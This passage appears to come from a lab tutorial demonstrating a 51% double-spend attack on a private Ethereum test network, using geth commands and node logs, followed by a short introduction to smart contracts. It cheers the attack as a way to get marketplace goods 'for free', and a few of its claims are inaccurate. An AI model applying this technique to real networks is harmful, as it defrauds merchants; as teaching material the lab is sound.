INFO [03-08|13:26:42.476] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousPerson/data/geth/ethash count=3
INFO [03-08|13:26:42.476] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:26:42.476] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=<nil>
WARN [03-08|13:26:42.476] Upgrade blockchain database version      from=<nil> to=7
INFO [03-08|13:26:42.478] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:26:42.478] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:26:42.479] Allocated fast sync bloom                size=8.00MiB
INFO [03-08|13:26:42.481] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=940.104µs
INFO [03-08|13:26:42.553] New local node record                    seq=1 id=b39e22b794d9c0ab ip=127.0.0.1 udp=60306 tcp=60306
INFO [03-08|13:26:42.554] Started P2P networking                   self=enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@127.0.0.1:60306
INFO [03-08|13:26:42.558] IPC endpoint opened                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:26:42.559] HTTP endpoint opened                     url=http://127.0.0.1:8547 cors= vhosts=localhost
WARN [03-08|13:26:42.641] Served eth_coinbase                      reqid=3 t=26.339µs err="etherbase must be explicitly specified"
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
at block: 0 (Thu Jan 01 1970 01:00:00 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> INFO [03-08|13:26:44.395] New local node record                    seq=2 id=b39e22b794d9c0ab ip=109.15.242.225 udp=60306 tcp=60306
> personINFO [03-08|13:26:52.620] Looking for peers                        peercount=1 tried=94 static=0
> personal.newAccount()
Passphrase:
Repeat passphrase:
INFO [03-08|13:27:12.891] Your new key was generated               address=0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a
WARN [03-08|13:27:12.891] Please backup your key file!             path=/root/blockchain_51/maliciousPerson/data/keystore/UTC--2020-03-08T12-27-12.640367351Z--11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
WARN [03-08|13:27:12.891] Please remember your password!
"0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"
> INFO [03-08|13:27:13.045] Looking for peers                        peercount=2 tried=62 static=0
> personal
{
  listAccounts: ["0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"],
  listWallets: [{
      accounts: [{...}],
      status: "Locked",
      url: "keystore:///root/blockchain_51/maliciousPerson/data/keystore/UTC--2020-03-08T12-27-12.640367351Z--11f7d3ee650bac6f676d4fc51dbbe153d590bc8a"
  }],
  deriveAccount: function(),
  ecRecover: function(),
  getListAccounts: function(callback),
  getListWallets: function(callback),
  importRawKey: function(),
  initializeWallet: function(),
  lockAccount: function(),
  newAccount: function(),
  openWallet: function(),
  sendTransaction: function(),
  sign: function(),
  signTransaction: function(),
  unlockAccount: function(),
  unpair: function()
}
> admin.nodeInfo.enodINFO [03-08|13:27:23.129] Looking for peers                        peercount=1 tried=141 static=0
> admin.nodeInfo.enode
"enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@109.15.242.225:60306"
> exit
INFO [03-08|13:27:24.959] HTTP endpoint closed                     url=http://127.0.0.1:8547
INFO [03-08|13:27:24.959] IPC endpoint closed                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:27:24.959] Blockchain manager stopped
INFO [03-08|13:27:24.959] Stopping Ethereum protocol
INFO [03-08|13:27:24.959] Ethereum protocol stopped
INFO [03-08|13:27:24.959] Transaction pool stopped
```

The important information here is the ethereum address of the maliciousPerson : *0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a*

#### Mine

In order to attack, the attacker will need :

- to be sync with the honestMiner
- to have some ethereum in order to execute a transaction

The maliciousMiner will have to add the enode value from the honestMiner in order to be sync :

{- On maliciousMiner host -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --rpccorsdomain "*" --datadir maliciousMiner/data --miner.threads 1 --bootnodes "enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303"`
```shell
WARN [03-08|13:32:09.680] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:32:09.680] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:32:09.680] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:32:09.682] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:32:09.682] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:32:09.682] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:32:09.913] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:32:09.914] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:32:09.914] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:32:09.914] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:32:09.914] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:32:09.915] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:32:09.915] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:32:09.916] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:32:09.922] Allocated fast sync bloom                size=328.00MiB
INFO [03-08|13:32:09.925] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=2.063ms
INFO [03-08|13:32:10.227] New local node record                    seq=3 id=358c5618374a8627 ip=127.0.0.1 udp=60303 tcp=60303
INFO [03-08|13:32:10.229] Started P2P networking                   self=enode://92d5d085f7c834762dd190095508d470f8dc001975e6d7a8689fb6b69ba1f749bdff8e2be1a1d948b78c850e7bfe017cbb31d998161e6112f608b7435d7d6ef0@127.0.0.1:60303
INFO [03-08|13:32:10.230] IPC endpoint opened                      url=/root/blockchain_51/maliciousMiner/data/geth.ipc
INFO [03-08|13:32:10.231] HTTP endpoint opened                     url=http://127.0.0.1:8545 cors=* vhosts=localhost
INFO [03-08|13:32:13.873] Block synchronisation started
INFO [03-08|13:32:13.891] Imported new state entries               count=3 elapsed=5.212ms processed=3 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:32:15.482] Imported new block headers               count=192 elapsed=1.485s  number=192 hash=cf25a5…459e2b
INFO [03-08|13:32:15.490] Imported new block receipts              count=128 elapsed=1.671ms number=128 hash=e93c19…23766a age=3m4s      size=512.00B
INFO [03-08|13:32:15.498] Imported new state entries               count=2   elapsed=3.876ms processed=5 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:32:15.498] Imported new block receipts              count=1   elapsed=75.315µs number=129 hash=33cdaa…abc5e0 age=3m3s      size=4.00B
INFO [03-08|13:32:15.499] Committed new head block                 number=129 hash=33cdaa…abc5e0
INFO [03-08|13:32:15.585] Deallocated fast sync bloom              items=6 errorrate=0.000
INFO [03-08|13:32:15.604] Imported new chain segment               blocks=63 txs=0 mgas=0.000 elapsed=18.650ms mgasps=0.000 number=192 hash=cf25a5…459e2b dirty=27.93KiB
INFO [03-08|13:32:17.001] Imported new block headers               count=2   elapsed=5.509ms  number=194 hash=397a21…656bfa
INFO [03-08|13:32:17.002] Imported new chain segment               blocks=2  txs=0 mgas=0.000 elapsed=752.225µs mgasps=0.000 number=194 hash=397a21…656bfa dirty=28.82KiB
INFO [03-08|13:32:17.084] Fast sync complete, auto disabling
INFO [03-08|13:32:23.200] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.129ms   mgasps=0.000 number=195 hash=aafd44…c4763e dirty=29.26KiB
INFO [03-08|13:32:26.066] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.889ms   mgasps=0.000 number=196 hash=59aa1b…c3c1af dirty=29.71KiB  |  
```

we can see here that the maliciousMiner is sync with the honest cause the block number are imported :

```shell
Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.129ms   mgasps=0.000 number=195 hash=aafd44…c4763e dirty=29.26KiB
```

**Kill the previous terminal.**

In order to have a chain more longer than the honestMiner, with a higher hashrate, the attacker will have to break the sync with the honestMiner and mine on its own with 4 more CPUs !

{- On maliciousMiner host -}

`geth --nousb --networkid 15 --port 60303 --rpc --rpcport 8545 --rpccorsdomain "*" --datadir maliciousMiner/data --miner.threads 4 --mine`
```shell
WARN [03-08|13:36:13.134] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:36:13.138] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:36:13.138] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:36:13.139] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:36:13.139] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:36:13.139] Allocated cache and file handles         database=/root/blockchain_51/maliciousMiner/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:36:13.478] Opened ancient database                  database=/root/blockchain_51/maliciousMiner/data/geth/chaindata/ancient
INFO [03-08|13:36:13.479] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:36:13.479] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousMiner/data/geth/ethash count=3
INFO [03-08|13:36:13.479] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:36:13.479] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:36:13.480] Loaded most recent local header          number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
INFO [03-08|13:36:13.480] Loaded most recent local full block      number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
INFO [03-08|13:36:13.480] Loaded most recent local fast block      number=254 hash=c145e9…0e5ca0 td=35367758 age=34s
```
{- KEEP IT RUNNING -}

The maliciousPerson will have to run an other miner in order to have some ethereum to transfer :

{- On maliciousPerson host -}

`geth --nousb --networkid 15 --port 60305 --rpc --rpcport 8547 --rpccorsdomain "*" --datadir maliciousPerson/data --miner.threads 1 --bootnodes "enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303" --mine --allow-insecure-unlock`
```shell
WARN [03-08|13:38:33.113] Sanitizing cache to Gos GC limits       provided=1024 updated=656
INFO [03-08|13:38:33.113] Maximum peer count                       ETH=50 LES=0 total=50
INFO [03-08|13:38:33.113] Smartcard socket not found, disabling    err="stat /run/pcscd/pcscd.comm: no such file or directory"
INFO [03-08|13:38:33.114] Starting peer-to-peer node               instance=Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
INFO [03-08|13:38:33.114] Allocated trie memory caches             clean=164.00MiB dirty=164.00MiB
INFO [03-08|13:38:33.114] Allocated cache and file handles         database=/root/blockchain_51/maliciousPerson/data/geth/chaindata cache=328.00MiB handles=524288
INFO [03-08|13:38:33.601] Opened ancient database                  database=/root/blockchain_51/maliciousPerson/data/geth/chaindata/ancient
INFO [03-08|13:38:33.602] Initialised chain configuration          config="{ChainID: 15 Homestead: 0 DAO: <nil> DAOSupport: false EIP150: 0 EIP155: 0 EIP158: 0 Byzantium: <nil> Constantinople: <nil> Petersburg: <nil> Istanbul: <nil>, Muir Glacier: <nil>, Engine: unknown}"
INFO [03-08|13:38:33.602] Disk storage enabled for ethash caches   dir=/root/blockchain_51/maliciousPerson/data/geth/ethash count=3
INFO [03-08|13:38:33.602] Disk storage enabled for ethash DAGs     dir=/root/.ethash count=2
INFO [03-08|13:38:33.602] Initialising Ethereum protocol           versions="[65 64 63]" network=15 dbversion=7
INFO [03-08|13:38:33.604] Loaded most recent local header          number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded most recent local full block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded most recent local fast block      number=0 hash=2d326d…48d0a3 td=10 age=50y10mo4w
INFO [03-08|13:38:33.604] Loaded local transaction journal         transactions=0 dropped=0
INFO [03-08|13:38:33.605] Regenerated local transaction journal    transactions=0 accounts=0
INFO [03-08|13:38:33.617] Allocated fast sync bloom                size=328.00MiB
INFO [03-08|13:38:33.618] Initialized fast sync bloom              items=1 errorrate=0.000 elapsed=950.435µs
INFO [03-08|13:38:33.726] New local node record                    seq=3 id=b39e22b794d9c0ab ip=127.0.0.1 udp=60305 tcp=60305
INFO [03-08|13:38:33.726] Started P2P networking                   self=enode://3310b580969280325f202366271c58ee55061ea5532e5ac26aeaa4dc05acbea2692b0ed668f3075ad03aa0fd062b2d66ca706aa3e05566827ebada69d1b37b01@127.0.0.1:60305
INFO [03-08|13:38:33.729] IPC endpoint opened                      url=/root/blockchain_51/maliciousPerson/data/geth.ipc
INFO [03-08|13:38:33.729] HTTP endpoint opened                     url=http://127.0.0.1:8547 cors=* vhosts=localhost
INFO [03-08|13:38:33.729] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:38:33.729] Updated mining threads                   threads=1
INFO [03-08|13:38:33.730] Transaction pool price threshold updated price=1000000000
INFO [03-08|13:38:33.730] Etherbase automatically configured       address=0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a
INFO [03-08|13:38:33.730] Commit new mining work                   number=1 sealhash=e63e8d…61596d uncles=0 txs=0 gas=0 fees=0 elapsed=164.912µs
INFO [03-08|13:38:34.257] Successfully sealed new block            number=1 sealhash=e63e8d…61596d hash=9d5ad0…3026a6 elapsed=526.954ms
INFO [03-08|13:38:34.257] 🔨 mined potential block                  number=1 hash=9d5ad0…3026a6
INFO [03-08|13:38:34.258] Commit new mining work                   number=2 sealhash=49e567…746b3d uncles=0 txs=0 gas=0 fees=0 elapsed=487.802µs
INFO [03-08|13:38:34.731] Successfully sealed new block            number=2 sealhash=49e567…746b3d hash=a31a73…79494f elapsed=473.858ms
INFO [03-08|13:38:34.741] 🔨 mined potential block                  number=2 hash=a31a73…79494f
INFO [03-08|13:38:34.732] Commit new mining work                   number=3 sealhash=353f5f…a8d55a uncles=0 txs=0 gas=0 fees=0 elapsed=222.024µs
INFO [03-08|13:38:37.930] Successfully sealed new block            number=3 sealhash=353f5f…a8d55a hash=2233eb…184930 elapsed=3.197s
INFO [03-08|13:38:37.930] 🔨 mined potential block                  number=3 hash=2233eb…184930
INFO [03-08|13:38:37.930] Commit new mining work                   number=4 sealhash=7fbd98…060758 uncles=0 txs=0 gas=0 fees=0 elapsed=329.098µs
INFO [03-08|13:38:38.282] Successfully sealed new block            number=4 sealhash=7fbd98…060758 hash=d7ba82…75812d elapsed=352.636ms
INFO [03-08|13:38:38.283] Commit new mining work                   number=5 sealhash=6b2da0…422fd0 uncles=0 txs=0 gas=0 fees=0 elapsed=266.942µs
INFO [03-08|13:38:38.293] 🔨 mined potential block                  number=4 hash=d7ba82…75812d
INFO [03-08|13:38:38.353] Successfully sealed new block            number=5 sealhash=6b2da0…422fd0 hash=e62713…0cb3bb elapsed=70.130ms
INFO [03-08|13:38:38.353] 🔨 mined potential block                  number=5 hash=e62713…0cb3bb
INFO [03-08|13:38:38.353] Commit new mining work                   number=6 sealhash=d77e5c…b9fd76 uncles=0 txs=0 gas=0 fees=0 elapsed=247.89µs
INFO [03-08|13:38:39.317] Successfully sealed new block            number=6 sealhash=d77e5c…b9fd76 hash=afdafb…acb151 elapsed=963.600ms
INFO [03-08|13:38:39.317] 🔨 mined potential block                  number=6 hash=afdafb…acb151
INFO [03-08|13:38:39.317] Commit new mining work                   number=7 sealhash=c209ef…e0507e uncles=0 txs=0 gas=0 fees=0 elapsed=234.739µs
INFO [03-08|13:38:43.574] Successfully sealed new block            number=7 sealhash=c209ef…e0507e hash=17c796…c9b8c3 elapsed=4.256s
INFO [03-08|13:38:43.574] 🔨 mined potential block                  number=7 hash=17c796…c9b8c3
INFO [03-08|13:38:43.574] Commit new mining work                   number=8 sealhash=02ec4f…008ddf uncles=0 txs=0 gas=0 fees=0 elapsed=246.359µs
INFO [03-08|13:38:43.727] Block synchronisation started
INFO [03-08|13:38:43.727] Mining aborted due to sync
INFO [03-08|13:38:43.781] Imported new state entries               count=3 elapsed=42.971ms  processed=3 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:38:45.412] Imported new block headers               count=192 elapsed=1.564s    number=192 hash=cf25a5…459e2b age=6m38s
INFO [03-08|13:38:45.422] Imported new block receipts              count=192 elapsed=1.963ms   number=192 hash=cf25a5…459e2b age=6m38s     size=768.00B
INFO [03-08|13:38:47.011] Imported new block headers               count=111 elapsed=157.650ms number=303 hash=13e30f…401e32
INFO [03-08|13:38:47.015] Imported new block receipts              count=47  elapsed=559.986µs number=239 hash=16bc76…843790 age=3m53s     size=188.00B
INFO [03-08|13:38:47.068] Imported new state entries               count=2   elapsed=51.539ms  processed=5 pending=0 retry=0 duplicate=0 unexpected=0
INFO [03-08|13:38:47.069] Imported new block receipts              count=1   elapsed=85.425µs  number=240 hash=318848…7a1d55 age=3m46s     size=4.00B
INFO [03-08|13:38:47.069] Committed new head block                 number=240 hash=318848…7a1d55
INFO [03-08|13:38:47.151] Deallocated fast sync bloom              items=6 errorrate=0.000
INFO [03-08|13:38:47.170] Imported new chain segment               blocks=63 txs=0 mgas=0.000 elapsed=18.133ms  mgasps=0.000 number=303 hash=13e30f…401e32 dirty=28.17KiB
INFO [03-08|13:38:49.932] Imported new block headers               count=2   elapsed=78.648ms  number=305 hash=ae0530…b7e9ab
INFO [03-08|13:38:49.934] Imported new chain segment               blocks=2  txs=0 mgas=0.000 elapsed=764.886µs mgasps=0.000 number=305 hash=ae0530…b7e9ab dirty=29.06KiB
INFO [03-08|13:38:49.937] Fast sync complete, auto disabling
INFO [03-08|13:38:49.938] 😱 block lost                             number=1   hash=9d5ad0…3026a6
INFO [03-08|13:38:49.938] 😱 block lost                             number=2   hash=a31a73…79494f
INFO [03-08|13:38:49.938] 😱 block lost                             number=3   hash=2233eb…184930
INFO [03-08|13:38:49.938] 😱 block lost                             number=4   hash=d7ba82…75812d
INFO [03-08|13:38:49.939] 😱 block lost                             number=5   hash=e62713…0cb3bb
INFO [03-08|13:38:49.939] 😱 block lost                             number=6   hash=afdafb…acb151
INFO [03-08|13:38:49.939] 😱 block lost                             number=7   hash=17c796…c9b8c3
INFO [03-08|13:38:49.939] Commit new mining work                   number=306 sealhash=c4dbfb…84d5ff uncles=0 txs=0 gas=0 fees=0 elapsed=2.451ms
INFO [03-08|13:38:52.792] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=6.008ms   mgasps=0.000 number=306 hash=69b853…2967d8 dirty=29.50KiB
INFO [03-08|13:38:52.792] Commit new mining work                   number=307 sealhash=f827e8…a52fb8 uncles=0 txs=0 gas=0 fees=0 elapsed=164.509µs
INFO [03-08|13:38:54.509] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=4.280ms   mgasps=0.000 number=307 hash=a72436…fabb4c dirty=29.94KiB
INFO [03-08|13:38:54.510] Commit new mining work                   number=308 sealhash=c02e25…c4fdb1 uncles=0 txs=0 gas=0 fees=0 elapsed=164.361µs
INFO [03-08|13:38:55.349] Imported new chain segment               blocks=1  txs=0 mgas=0.000 elapsed=3.952ms   mgasps=0.000 number=308 hash=fa998b…65b606 dirty=30.39KiB
INFO [03-08|13:38:55.349] Commit new mining work                   number=309 sealhash=7a542d…f9c966 uncles=0 txs=0 gas=0 fees=0 elapsed=187.086µs
```
{- KEEP IT RUNNING -}

Then, open a session with your maliciousPerson and execute a transaction to a marketplace for example.
To create a transaction, you need, the ethereum address of the maliciousPerson, the ethereum address of the marketplace, and the amount.

To begin you need to unlock the maliciousPerson account with its address and the password given when you created its account : ```personal.unlockAccount("0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a","maliciousperson")```

Then send a transaction to the marketplace ```web3.eth.sendTransaction({from: "0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f", value: 1000000000000000000})```

The return of the transaction is its ID in the blockchain, you can get more informations about it if you run : ```web3.eth.getTransactionReceipt("TRANSACTION_ID")```

{- On maliciousPerson host -}

`geth --ipcpath geth.ipc --datadir maliciousPerson/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
at block: 429 (Sun Mar 08 2020 13:43:07 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> personal.unlockAccount("0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", "maliciousperson")
true
> web3.eth.sendTransaction({from: "0x11f7d3EE650Bac6f676D4fc51dbBE153D590BC8a", to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f", value: 1000000000000000000})
"0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696"
> web3.eth.getTransactionReceipt("0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696")
{
  blockHash: "0x8bbdd1a3187d11361bd3759f82e9de037bbd254e50fbda75cc564446016a568f",
  blockNumber: 466,
  contractAddress: null,
  cumulativeGasUsed: 21000,
  from: "0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a",
  gasUsed: 21000,
  logs: [],
  logsBloom: "0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000",
  root: "0x42e9a4ca7eb3f7a59d33a35c6f608d642bf128d7b969a1a2f4250bc8c74c55ab",
  to: "0xe82e809d5f9574b54a4b8ead7e195b163b39662f",
  transactionHash: "0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696",
  transactionIndex: 0
}
```

As we can see, the smartcontract is created and validated by the honestMiner at the block *466*.

Now open a session with the maliciousMiner and sync with the honestMiner with the commande : *admin.addPeer()* :

{- On maliciousMiner host -}

`geth --ipcpath geth.ipc --datadir maliciousMiner/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0xeab6ffe92041e39233c95451a72cf5e82cd23297
at block: 556 (Sun Mar 08 2020 13:43:06 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousMiner/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> admin.addPeer("enode://c6ab8727e45dee49304d48a89b8250ef4d792316340b7f1c48b63e1d627915a532f06f1fd8b8390c78d35acda1eeb9d08ddbf60466dd658ffc50395315aa2026@192.168.0.17:60303")
true
```

The synchronisation is done, and if you check the logs from the honestMiner you have to see the synchronisation with the maliciousMiner. Its last block number was the 491, and then with the synchronisation, he reorganised the chain from blocknumber 237 to 660.

```shell
INFO [03-08|13:45:50.194] Successfully sealed new block            number=491 sealhash=0dae97…415534 hash=f118f2…66313c elapsed=1.648s
INFO [03-08|13:45:50.194] 🔗 block reached canonical chain          number=484 hash=c5ce1d…bb2fe0
INFO [03-08|13:45:50.195] Commit new mining work                   number=492 sealhash=d72305…1b336c uncles=0 txs=0 gas=0     fees=0       elapsed=907.748µs
INFO [03-08|13:45:50.195] 🔨 mined potential block                  number=491 hash=f118f2…66313c
INFO [03-08|13:45:51.882] Block synchronisation started
INFO [03-08|13:45:51.883] Mining aborted due to sync
INFO [03-08|13:45:54.026] Importing sidechain segment              start=14 end=638
WARN [03-08|13:45:54.198] Large chain reorg detected               number=254 hash=c145e9…0e5ca0 drop=237 dropfrom=f118f2…66313c add=237 addfrom=d307a6…cba24c
INFO [03-08|13:45:54.269] Imported new chain segment               blocks=625 txs=0 mgas=0.000 elapsed=243.145ms mgasps=0.000 number=638 hash=fe2c57…9bc3ef dirty=60.99KiB
INFO [03-08|13:45:55.471] Imported new chain segment               blocks=19  txs=0 mgas=0.000 elapsed=105.940ms mgasps=0.000 number=657 hash=a731ef…c90bff dirty=60.99KiB
INFO [03-08|13:45:55.473] 😱 block lost                             number=485 hash=9d4fde…106d6c
INFO [03-08|13:45:55.473] 😱 block lost                             number=487 hash=5a451f…47f46b
INFO [03-08|13:45:55.473] 😱 block lost                             number=488 hash=d1ca36…84ca96
INFO [03-08|13:45:55.474] 😱 block lost                             number=490 hash=275b8a…e0cc41
INFO [03-08|13:45:55.474] 😱 block lost                             number=491 hash=f118f2…66313c
INFO [03-08|13:45:55.474] Commit new mining work                   number=658 sealhash=90f6ff…86f93c uncles=0 txs=0 gas=0     fees=0       elapsed=1.098ms
INFO [03-08|13:45:56.228] Imported new chain segment               blocks=1   txs=0 mgas=0.000 elapsed=5.389ms   mgasps=0.000 number=658 hash=479cff…54e507 dirty=60.99KiB
INFO [03-08|13:45:56.229] Commit new mining work                   number=659 sealhash=a7f83e…0b8aa1 uncles=0 txs=0 gas=0     fees=0       elapsed=164.506µs
INFO [03-08|13:45:57.470] Successfully sealed new block            number=659 sealhash=a7f83e…0b8aa1 hash=615a0f…2e81e7 elapsed=1.241s
INFO [03-08|13:45:57.471] 🔨 mined potential block                  number=659 hash=615a0f…2e81e7
INFO [03-08|13:45:57.471] Commit new mining work                   number=660 sealhash=ceb40b…f1b31d uncles=0 txs=0 gas=0     fees=0       elapsed=349.797µs
```

As our transaction was the block 466, it's normally deleted, check the transaction again from the maliciousPerson console :

{- On maliciousMiner host -}

`geth --ipcpath geth.ipc --datadir maliciousPerson/data attach`
```shell
Welcome to the Geth JavaScript console!

instance: Geth/v1.9.11-stable-6a62fe39/linux-amd64/go1.13.8
coinbase: 0x11f7d3ee650bac6f676d4fc51dbbe153d590bc8a
at block: 429 (Sun Mar 08 2020 13:43:07 GMT+0100 (CET))
 datadir: /root/blockchain_51/maliciousPerson/data
 modules: admin:1.0 debug:1.0 eth:1.0 ethash:1.0 miner:1.0 net:1.0 personal:1.0 rpc:1.0 txpool:1.0 web3:1.0

> web3.eth.getTransactionReceipt("0x2db31525f37ecfb38ef934c125ae9534a4889325142caa336b9acf8b112a5696")
null
```

- Not existing anymore !!!
- Well done !!! :D

You can see here that you bought for exmaple an SSD on the marketplace and be able to delete the transaction. So you have it for free :D

## The smart contract ##

### Definition

<div style="text-align: justify">
A "smart contract" is an agreement between several parties in the form of computer code. They are distributed and therefore stored in a public database and cannot be modified (in our case a blockchain). They allow transactions to be carried out automatically without the need for a third party, thus not depending on anyone. Automated transactions occur when one or more conditions of the contract are met.
</div>

### Example of smart contract
<div style="text-align: justify">

**Insurance**:
In September 2017, a subsidiary of the AXA insurance group named Fizzy launched a 100% automated insurance service thanks to smart contracts. This service automatically compensates passengers whose flights are delayed for more than 2 hours.

**Health** :
In this area we can mention Kidner Project, a project in which the French company Sajida Zouarhi participated, which aims to decentralize and increase the traceability of organ transplant management.

**Companies** :
Smart contracts can be used in the management of a company. For example, all salary payments can be automated in a simple and reliable way.

</div>

### The language used: Solidity

<div style="text-align: justify">

Solidity is an object-oriented programming language that has similarities with JavaScript or C++. It is a high-level language, which will be compiled into a low-level language (bytecode) to be interpreted by the Ethereum execution environment.
